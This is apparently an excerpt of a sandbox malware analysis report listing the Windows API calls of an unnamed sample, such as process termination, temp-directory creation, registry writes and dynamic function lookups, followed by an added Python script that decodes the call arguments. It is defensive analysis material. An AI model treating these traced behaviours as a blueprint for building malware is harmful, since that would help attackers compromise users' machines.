                                                              • Part of subcall function 04569622: lstrlen.KERNEL32(00000000,00000000,73BB81D0,00000000,?,?,?,04577DD0,?,00000000,00000000,?,?,045763BE,00000000,049BB188), ref: 04569689
                                                              • Part of subcall function 04569622: sprintf.NTDLL ref: 045696AA
                                                            • lstrlen.KERNEL32(00000000,73BB81D0,?,00000000,00000000,?,?,045763BE,00000000,049BB188), ref: 04577DE2
                                                            • lstrlen.KERNEL32(?,?,?,045763BE,00000000,049BB188), ref: 04577DEA
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • strcpy.NTDLL ref: 04577E01
                                                            • lstrcat.KERNEL32(00000000,?), ref: 04577E0C
                                                              • Part of subcall function 04571766: lstrlen.KERNEL32(?,?,?,00000000,?,04577E1B,00000000,?,?,?,045763BE,00000000,049BB188), ref: 04571777
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,045763BE,00000000,049BB188), ref: 04577E29
                                                              • Part of subcall function 04581D0B: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04577E35,00000000,?,?,045763BE,00000000,049BB188), ref: 04581D15
                                                              • Part of subcall function 04581D0B: _snprintf.NTDLL ref: 04581D73
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                            • String ID: =
                                                            • API String ID: 2864389247-1428090586
                                                            • Opcode ID: 3a0e3256684355138030f6a0484e2ec14e26b4245de0c4748e4c17b84f4c929b
                                                            • Instruction ID: 07f8fea99ccef0613a0afc3dfec66562c66ab74f2622157708e8325ee286f66a
                                                            • Opcode Fuzzy Hash: 3a0e3256684355138030f6a0484e2ec14e26b4245de0c4748e4c17b84f4c929b
                                                            • Instruction Fuzzy Hash: CF11C1739012267797127B79BC84C6F36ACBF99A583054029F901B7200CE39FD02B7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04581A4A
                                                            • wcstombs.NTDLL ref: 04581A5B
                                                              • Part of subcall function 0456CB3E: StrChrA.SHLWAPI(1D4E36C0,0000002E,00000000,00000000,?,1D4E36C0,0457DBAB,00000000,00000000,00000000), ref: 0456CB50
                                                              • Part of subcall function 0456CB3E: StrChrA.SHLWAPI(00000004,00000020,?,1D4E36C0,0457DBAB,00000000,00000000,00000000), ref: 0456CB5F
                                                            • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 04581A7C
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 04581A8B
                                                            • CloseHandle.KERNEL32(00000000), ref: 04581A92
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04581AA1
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 04581AB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                                                            • String ID:
                                                            • API String ID: 417118235-0
                                                            • Opcode ID: 1954bcac1ceadcd3329c3f9ffecd9158f1cdb9a090f159073e6f36342b89c501
                                                            • Instruction ID: 3d354bd7107e51192e7bc886f459a6f0c6a5d21e40d5844e30193244cdb8e966
                                                            • Opcode Fuzzy Hash: 1954bcac1ceadcd3329c3f9ffecd9158f1cdb9a090f159073e6f36342b89c501
                                                            • Instruction Fuzzy Hash: 1E118E31600616FBDB11AB55EC48BAA7BA8FB00745F141018F505B6181CFB9EC95EBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000), ref: 045790FF
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579118
                                                              • Part of subcall function 045790ED: GetCurrentThreadId.KERNEL32 ref: 04579125
                                                              • Part of subcall function 045790ED: GetSystemTimeAsFileTime.KERNEL32(0456EE33,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579131
                                                              • Part of subcall function 045790ED: GetTempFileNameA.KERNEL32(00000000,00000000,0456EE33,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?), ref: 0457913F
                                                              • Part of subcall function 045790ED: lstrcpy.KERNEL32(00000000), ref: 04579161
                                                            • lstrcpy.KERNEL32(-000000FC,00000000), ref: 0457AC73
                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,0456C4A0,?,?,00000000,?,04562273,00000000), ref: 0457AC85
                                                            • GetTickCount.KERNEL32 ref: 0457AC90
                                                            • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,0456C4A0,?,?,00000000,?,04562273,00000000), ref: 0457AC9C
                                                            • lstrcpy.KERNEL32(00000000), ref: 0457ACB6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                                                            • String ID: \Low
                                                            • API String ID: 1629304206-4112222293
                                                            • Opcode ID: 2f853ca8ae4e74ea517c2313833a1b5b31c299b5fb059412bc2ef9b5ecd09029
                                                            • Instruction ID: bb729eb37c676c2b4f0df36e73a35513092846e091ee837185e46c51ca405166
                                                            • Opcode Fuzzy Hash: 2f853ca8ae4e74ea517c2313833a1b5b31c299b5fb059412bc2ef9b5ecd09029
                                                            • Instruction Fuzzy Hash: F4018031601615BFE3116B75BC4CF5F7A9CFF85651B054038F511E6240CF18ED05A6B5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wsprintfA.USER32 ref: 0456B7CC
                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 0456B7DE
                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0456B808
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0456B81B
                                                            • CloseHandle.KERNEL32(?), ref: 0456B824
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                                                            • String ID: 0x%08X
                                                            • API String ID: 603522830-3182613153
                                                            • Opcode ID: ca5c8302db72665b63317f1da4a1338fece72b43d905957a701ef9c52a7496ab
                                                            • Instruction ID: cf43ff89c79b01ee214df1cc942b9d73deea0fdde2514551a6e9069e290d2ec5
                                                            • Opcode Fuzzy Hash: ca5c8302db72665b63317f1da4a1338fece72b43d905957a701ef9c52a7496ab
                                                            • Instruction Fuzzy Hash: C1015E71900129BBCB10ABA4DC49DEF7F7CFF05354F104118F516E2181DB75AA05DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • GetLastError.KERNEL32(?,?,?,00001000), ref: 045635C4
                                                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,?), ref: 04563649
                                                            • CloseHandle.KERNEL32(00000000), ref: 04563663
                                                            • OpenProcess.KERNEL32(00100000,00000000,00000000,?,?), ref: 04563698
                                                              • Part of subcall function 04583C5F: RtlReAllocateHeap.NTDLL(00000000,?,?,04563607), ref: 04583C6F
                                                            • WaitForSingleObject.KERNEL32(?,00000064), ref: 0456371A
                                                            • CloseHandle.KERNEL32(?), ref: 04563741
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                                                            • String ID:
                                                            • API String ID: 3115907006-0
                                                            • Opcode ID: f7c7a8fe6f5e837eddd54addecb8a9738712cab2641f65aa0ccd70419dc0baf7
                                                            • Instruction ID: 33683e9170ae2241397ec70ab9fa882f08f8c27ef109ad23782cd085d09edab9
                                                            • Opcode Fuzzy Hash: f7c7a8fe6f5e837eddd54addecb8a9738712cab2641f65aa0ccd70419dc0baf7
                                                            • Instruction Fuzzy Hash: 52812771A00219EFDF11DF98D984AADBBB5FF08744F148859E806BB250D731AE50EBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C11
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C1D
                                                              • Part of subcall function 04580BC5: memset.NTDLL ref: 04580C65
                                                              • Part of subcall function 04580BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04580C80
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(0000002C), ref: 04580CB8
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?), ref: 04580CC0
                                                              • Part of subcall function 04580BC5: memset.NTDLL ref: 04580CE3
                                                              • Part of subcall function 04580BC5: wcscpy.NTDLL ref: 04580CF5
                                                            • WaitForSingleObject.KERNEL32(00000000,?,049B993C,?,00000000,00000000,00000001), ref: 0456A961
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0456A99B
                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 0456A9BE
                                                            • RegCloseKey.ADVAPI32(?), ref: 0456A9C7
                                                            • WaitForSingleObject.KERNEL32(00000000,Function_00008936,0458C1E4), ref: 0456AA2B
                                                            • RtlExitUserThread.NTDLL(?), ref: 0456AA61
                                                              • Part of subcall function 04575EFC: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,04575A38,00000000,?,?), ref: 04575F1A
                                                              • Part of subcall function 04575EFC: GetFileSize.KERNEL32(00000000,00000000,?,?,04575A38,00000000,?,?,?,?,00000000,0456DBFF,?,?,?,?), ref: 04575F2A
                                                              • Part of subcall function 04575EFC: CloseHandle.KERNEL32(000000FF,?,?,04575A38,00000000,?,?,?,?,00000000,0456DBFF,?,?,?,?,00000000), ref: 04575F8C
                                                              • Part of subcall function 0457533D: CreateFileW.KERNEL32(00000000,C0000000,0457F1B3,00000000,0457F1B4,00000080,00000000,00000000,04584C6A,00000000,0457F1B3,?), ref: 0457537E
                                                              • Part of subcall function 0457533D: GetLastError.KERNEL32 ref: 04575388
                                                              • Part of subcall function 0457533D: WaitForSingleObject.KERNEL32(000000C8), ref: 045753AD
                                                              • Part of subcall function 0457533D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 045753CE
                                                              • Part of subcall function 0457533D: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 045753F6
                                                              • Part of subcall function 0457533D: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 0457540B
                                                              • Part of subcall function 0457533D: SetEndOfFile.KERNEL32(00000001), ref: 04575418
                                                              • Part of subcall function 0457533D: CloseHandle.KERNEL32(00000001), ref: 04575430
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserValueWritewcscpy
                                                            • String ID:
                                                            • API String ID: 90276831-0
                                                            • Opcode ID: f703438311a27bbd3305acbbd7ba9b7e56232c0bafbce2ea0efea0bf43517f43
                                                            • Instruction ID: 01e7f9102d26d15e1251c9e66c80b53509db7bbe158629ea9340e805196b9f11
                                                            • Opcode Fuzzy Hash: f703438311a27bbd3305acbbd7ba9b7e56232c0bafbce2ea0efea0bf43517f43
                                                            • Instruction Fuzzy Hash: A6515C71A00209AFDB11DFA4D885E9A77F9FB05704F01406AF605F7250EB74BE49EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
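
The API-call listings above give their arguments as raw hexadecimal: the process-termination routine (refs 04581A7C to 04581AB1, OpenProcess with access 00000001 followed by TerminateProcess), the CreateFileA call at ref 04568DF5 (80000000, 00000001, 00000003, 00000080), and the routine at refs 0456A961 to 0456AA61, whose RegOpenKeyA takes 80000001 and whose RegSetValueExA writes type 00000004, with a subcall that does SetFilePointer(…,00000002), WriteFile and SetEndOfFile. The following Python is an added example and not part of the Joe Sandbox report or of the sample: it parses lines in the format printed on this page (the grammar is inferred from these lines), names the Win32 constants (documented values), flags argument bits it cannot name so that unresolved sandbox arguments stay visible, and derives a coarse behaviour summary from call patterns; the pattern rules are this example's own heuristics, not something the report states.

```python
"""Annotate Joe Sandbox 'APIs' lines (as printed on this page) with named Win32 constants.
Added example, not part of the report or the sample: the line grammar is inferred from this
page, the constant values are the documented Win32 ones, the behaviour rules are heuristics."""
import re

LINE_RE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")

PROCESS_ACCESS = {0x1: "PROCESS_TERMINATE", 0x8: "PROCESS_VM_OPERATION", 0x10: "PROCESS_VM_READ",
                  0x20: "PROCESS_VM_WRITE", 0x400: "PROCESS_QUERY_INFORMATION", 0x100000: "SYNCHRONIZE"}
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE", 0x20000000: "GENERIC_EXECUTE"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
FILE_ATTR = {0x2: "FILE_ATTRIBUTE_HIDDEN", 0x80: "FILE_ATTRIBUTE_NORMAL", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
REG_TYPE = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}

# API name with A/W suffix stripped -> {argument index: (parameter name, kind, table)}
ARG_DECODERS = {
    "OpenProcess": {0: ("dwDesiredAccess", "flags", PROCESS_ACCESS)},
    "CreateFile": {1: ("dwDesiredAccess", "flags", GENERIC), 2: ("dwShareMode", "flags", SHARE),
                   4: ("dwCreationDisposition", "enum", DISPOSITION), 5: ("dwFlagsAndAttributes", "flags", FILE_ATTR)},
    "RegOpenKey": {0: ("hKey", "enum", HKEY)},
    "RegSetValueEx": {3: ("dwType", "enum", REG_TYPE)},
    "SetFilePointer": {3: ("dwMoveMethod", "enum", MOVE_METHOD)},
    "WaitForSingleObject": {1: ("dwMilliseconds", "ms", None)},
}

def decode_flags(value, table):
    """Name known bits; leftover bits stay as hex so an unresolved sandbox argument is visible."""
    names = [name for bit, name in table.items() if (value & bit) == bit]
    rest = value & ~sum(bit for bit, name in table.items() if (value & bit) == bit)
    return "|".join(names + ([f"0x{rest:08X}"] if rest else [])) or "0"

def parse_args(text):
    """Eight-hex-digit tokens become ints; '?' (unresolved) and literals such as '=' stay strings."""
    toks = [t.strip() for t in text.split(",")] if text else []
    return [int(t, 16) & 0xFFFFFFFF if re.fullmatch(r"-?[0-9A-Fa-f]{8}", t) else t for t in toks]

def decode_line(line):
    """Parse one 'APIs' line; returns None for lines that are not API references."""
    m = LINE_RE.match(line)
    if not m:
        return None
    api = m.group("api")
    base = api if api in ARG_DECODERS else api.rstrip("AW")
    args, decoded = parse_args(m.group("args")), {}
    for idx, (name, kind, table) in ARG_DECODERS.get(base, {}).items():
        if idx < len(args) and isinstance(args[idx], int):
            v = args[idx]
            decoded[name] = (decode_flags(v, table) if kind == "flags"
                             else table.get(v, f"0x{v:08X}") if kind == "enum"
                             else "INFINITE" if v == 0xFFFFFFFF else f"{v} ms")
    return {"api": api, "base": base, "module": m.group("mod"), "ref": m.group("ref"),
            "subcall": m.group("sub"), "args": args, "decoded": decoded}

def decode_report(text):
    return [c for c in map(decode_line, text.splitlines()) if c]

def describe(calls):
    """Coarse behaviour statements from call patterns (this example's own heuristics)."""
    def has(api, **want):
        return any(c["base"] == api and all(c["decoded"].get(k) == v for k, v in want.items()) for c in calls)
    findings = []
    if has("OpenProcess", dwDesiredAccess="PROCESS_TERMINATE") and has("TerminateProcess"):
        findings.append("terminates a process by PID")
    if has("RegOpenKey", hKey="HKEY_CURRENT_USER") and has("RegSetValueEx", dwType="REG_DWORD"):
        findings.append("writes a REG_DWORD value under HKEY_CURRENT_USER")
    if has("SetFilePointer", dwMoveMethod="FILE_END") and has("WriteFile") and has("SetEndOfFile"):
        findings.append("seeks to end of file, writes, then sets EOF (append pattern)")
    return findings

# Constructed input: lines copied from the 'APIs' sections of this report (argument lists shortened).
SAMPLE = """\
• OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 04581A7C
• TerminateProcess.KERNEL32(00000000,00000000), ref: 04581A8B
• RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0456A99B
• RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 0456A9BE
• Part of subcall function 0457533D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 045753CE
• Part of subcall function 0457533D: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 045753F6
• Part of subcall function 0457533D: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 0457540B
• Part of subcall function 0457533D: SetEndOfFile.KERNEL32(00000001), ref: 04575418
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 04568DF5
• WaitForSingleObject.KERNEL32(?,00000064), ref: 0456371A
"""

if __name__ == "__main__":
    calls = decode_report(SAMPLE)
    for c in calls:
        sub = f"[sub {c['subcall']}] " if c["subcall"] else ""
        print(f"{c['ref']} {sub}{c['api']} {c['decoded']}")
    print("behaviour:", "; ".join(describe(calls)))
```

The leftover-bits rule matters on a page like this one: the share-mode argument 0457F1B3 printed for the CreateFileW at ref 0457537E is not a plausible flag combination but a value the sandbox could not resolve, and the decoder keeps it as FILE_SHARE_READ|FILE_SHARE_WRITE|0x0457F1B0 rather than silently naming only the low bits.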

                                                            APIs
                                                            • RtlImageNtHeader.NTDLL(?), ref: 0456F0D9
                                                              • Part of subcall function 045793FF: lstrlenW.KERNEL32(00000000,73BCF560,00000000,?,00000000), ref: 0457942B
                                                              • Part of subcall function 045793FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 0457943D
                                                              • Part of subcall function 045793FF: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0457945A
                                                              • Part of subcall function 045793FF: lstrlenW.KERNEL32(00000000), ref: 04579466
                                                              • Part of subcall function 045793FF: HeapFree.KERNEL32(00000000,00000000), ref: 0457947A
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 0456F111
                                                            • CloseHandle.KERNEL32(?), ref: 0456F11F
                                                            • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 0456F1F1
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0456F200
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 0456F213
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                                                            • String ID:
                                                            • API String ID: 1719504581-0
                                                            • Opcode ID: 491aca85316a47ab8324dcda6bbd380d779a2c87908d7a9c440326292ce31dd6
                                                            • Instruction ID: 9253c4e8445059fe36c9a1a2a7461fd9039d8e6408b766f60bb67ede57782d00
                                                            • Opcode Fuzzy Hash: 491aca85316a47ab8324dcda6bbd380d779a2c87908d7a9c440326292ce31dd6
                                                            • Instruction Fuzzy Hash: E3416F36A00606EBEB229F95FC84A9E77B9FB44744F104029E906A7250DF74F949FF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b40d96e14d03e67b2c7088ee5be54131c6415e54a9e74da0b82129792a689457
                                                            • Instruction ID: ea70de28aa09f0bcb96fc8eb7ca7fa08f2cece54213f613244ad71a2c9e42915
                                                            • Opcode Fuzzy Hash: b40d96e14d03e67b2c7088ee5be54131c6415e54a9e74da0b82129792a689457
                                                            • Instruction Fuzzy Hash: B841B271601705AFD7209F25988992BBBE9FB84774B104A3DF2A7D35C0DB31B805EB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04574B63: lstrlen.KERNEL32(?,770F4620,00000000,?,00000000,04561211,?), ref: 04574B72
                                                              • Part of subcall function 04574B63: mbstowcs.NTDLL ref: 04574B8E
                                                            • lstrlenW.KERNEL32(00000000,?), ref: 0456C042
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C11
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C1D
                                                              • Part of subcall function 04580BC5: memset.NTDLL ref: 04580C65
                                                              • Part of subcall function 04580BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04580C80
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(0000002C), ref: 04580CB8
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?), ref: 04580CC0
                                                              • Part of subcall function 04580BC5: memset.NTDLL ref: 04580CE3
                                                              • Part of subcall function 04580BC5: wcscpy.NTDLL ref: 04580CF5
                                                            • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0456C063
                                                            • lstrlenW.KERNEL32(0456EE33), ref: 0456C08D
                                                              • Part of subcall function 04580BC5: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04580D1B
                                                              • Part of subcall function 04580BC5: RtlEnterCriticalSection.NTDLL(?), ref: 04580D50
                                                              • Part of subcall function 04580BC5: RtlLeaveCriticalSection.NTDLL(?), ref: 04580D6C
                                                              • Part of subcall function 04580BC5: FindNextFileW.KERNEL32(?,00000000), ref: 04580D85
                                                              • Part of subcall function 04580BC5: WaitForSingleObject.KERNEL32(00000000), ref: 04580D97
                                                              • Part of subcall function 04580BC5: FindClose.KERNEL32(?), ref: 04580DAC
                                                              • Part of subcall function 04580BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04580DC0
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(0000002C), ref: 04580DE2
                                                            • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0456C0AA
                                                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0456C0C1
                                                            • PathFindFileNameW.SHLWAPI(0000001E), ref: 0456C0D6
                                                              • Part of subcall function 0457EDBE: lstrlenW.KERNEL32(00000000,?,00000002,00000000,?,?,?,0456C0ED,?,0000001E,?), ref: 0457EDD3
                                                              • Part of subcall function 0457EDBE: lstrlenW.KERNEL32(00000000,?,?,?,0456C0ED,?,0000001E,?), ref: 0457EDDB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                                                            • String ID:
                                                            • API String ID: 2670873185-0
                                                            • Opcode ID: 582288a1323d2a53b31d1d5676caa3aa140bc2ca7ca34a1b671ce5703083c2dc
                                                            • Instruction ID: 1be234818b12cb6dafced5d7e5dceba87ae65903e0d2ca4e840971e38e2d8c73
                                                            • Opcode Fuzzy Hash: 582288a1323d2a53b31d1d5676caa3aa140bc2ca7ca34a1b671ce5703083c2dc
                                                            • Instruction Fuzzy Hash: 40316E72504206AFDB11EF64D88482FBBF9FF98758F00092EF595A3150EB35ED09AB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0456CDE5
                                                            • CreateWaitableTimerA.KERNEL32(0458C1A8,00000001,?), ref: 0456CE02
                                                            • GetLastError.KERNEL32(?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE13
                                                              • Part of subcall function 045768B2: RegQueryValueExA.KERNELBASE(00000000,04575AB0,00000000,04575AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?), ref: 045768EA
                                                              • Part of subcall function 045768B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 045768FE
                                                              • Part of subcall function 045768B2: RegQueryValueExA.ADVAPI32(00000000,04575AB0,00000000,04575AB0,00000000,?,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40), ref: 04576918
                                                              • Part of subcall function 045768B2: RegCloseKey.ADVAPI32(00000000,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04576942
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE53
                                                            • SetWaitableTimer.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE72
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE88
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                                                            • String ID:
                                                            • API String ID: 1835239314-0
                                                            • Opcode ID: b4d31c13c23ba98bccaed730fa147801f3957acff44098bedf61bec45c8ec155
                                                            • Instruction ID: 70c195caba63e25f087b16cb62586f6853aa398ff98040f463d74a5ada3a3aa7
                                                            • Opcode Fuzzy Hash: b4d31c13c23ba98bccaed730fa147801f3957acff44098bedf61bec45c8ec155
                                                            • Instruction Fuzzy Hash: 2C315C71D00109EBCF22DFA5D889CAFBBB9FB84750B10841AF446E7101D734AE48EBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,045797AB,?,?,?,00000000,00000000), ref: 0456F7D4
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0456F7F6
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0456F80C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0456F822
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0456F838
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0456F84E
                                                              • Part of subcall function 0457A21F: memset.NTDLL ref: 0457A2A0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProc$AllocateHandleHeapModulememset
                                                            • String ID:
                                                            • API String ID: 1886625739-0
                                                            • Opcode ID: bf7cba2380d4185ed98f1b2652cefbeaa0189392926bebbc8b9aec573e67a5a2
                                                            • Instruction ID: 8a7fe24861464c964b9e454fcb637dfdc5ac6edc2c3a7b659667d883d705c244
                                                            • Opcode Fuzzy Hash: bf7cba2380d4185ed98f1b2652cefbeaa0189392926bebbc8b9aec573e67a5a2
                                                            • Instruction Fuzzy Hash: E8212EB2A0030ADFD750DF69E884E5A77FCFB49744B008569E50AE7311EB74E9059B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • StrChrA.SHLWAPI(00000000,00000020,00000000,?,00000000,?,?,?,04573BE7,00000000,?,0458BAA8,?,?,0458C140), ref: 045786D5
